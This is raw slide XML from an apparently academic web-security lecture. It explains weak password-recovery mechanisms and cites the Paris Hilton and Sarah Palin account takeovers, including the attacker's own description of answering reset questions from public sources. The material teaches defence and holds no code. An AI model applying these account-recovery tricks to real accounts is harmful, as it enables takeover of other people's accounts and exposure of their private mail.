              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44036" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Weak Password Recovery Validation is when a web site permits an attacker to illegally obtain, change or recover another users credentials. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>A website is said to have a weak password recovery mechanism when a hacker can easily foil the recovery mechanism by easily guessing the answers to the secret questions and thus recovering or changing the password of the legitimate user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The following are some example of a bad recovery method.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" b="1" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Information Verification </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>: Asking the user to supply their email address along with their phone number. Note that these are both publicly available.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" b="1" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Password Hints </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>: Many users have a tendency to embed the password in the hint itself. Example hint : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>bday+favauthor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> which can be easily translated by someone knowing the person  to  110490asimov.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" b="1" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Secret Question + Answer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>: Something like </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In which city were you born?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1500" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> for a password recovery system is easily </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1500" dirty="0" err="1">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>circumventable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1500" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> today because most of the information is public due to social networking sites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="8E736A"/>
              </a:solidFill>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="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tLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Weak Password Recovery Example</a:t>
            </a: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50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418CCC2-DDDB-4EF5-B523-F93710DC14DE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45060" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Paris Hilton T-Mobile account hacked (2005) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.macdevcenter.com/pub/a/mac/2005/01/01/paris.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>A group of hackers hacked into Hiltons T-Mobile Sidekick account and posted contents from her email inbox all over the internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>While the hack used a combination of social engineering tricks and technical flaws, the hack was finally successful because the hackers were able to reset Hiltons password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Like many online service providers, T-Mobile.com required users to answer a "secret question" if they forget their passwords. For Hilton's account, the secret question was "What is your favorite pet's name?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Just Google for the answer  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="955E4B"/>
              </a:solidFill>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="955E4B"/>
              </a:solidFill>
              <a:cs typeface="Geneva" pitchFamily="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algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Table of Contents</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17410" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>General Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Authentication Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Authorization Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Client Side Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Injection Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Recent Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Privacy Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright (c) 2009-2016  Arun Viswanatha, Ellis Horowitz, Marco Papa</a:t>
            </a:r>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014CDC9-BCFF-4ED9-90C1-DE74FFA9FC66}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B05020201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altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Weak Password Recovery Example (cont..)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5325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60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78B3F7-3E4C-4CB3-8239-B48B42880278}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46084" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Sarah Palins Email account hack (2008)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://blog.wired.com/27bstroke6/2008/09/palin-e-mail-ha.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> )</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>This is what the hacker had to say about it </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>     In the past couple days news had come to light about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>palin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> using a yahoo mail account, it was in news stories and such, a thread was started full of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>newfags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> trying to do something that would not get this off the ground, for the next 2 hours the acct was locked from password recovery presumably from all this bullshit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>spamming.after</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> the password recovery was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>reenabled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>, it took seriously 45 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>mins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>wikipedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> and google to find the info, Birthday? 15 seconds on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>wikipedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>, zip code? well she had always been from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>wasilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>, and it only has 2 zip codes (thanks online postal service!) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>      the second was somewhat harder, the question was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>where did you meet your spouse?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
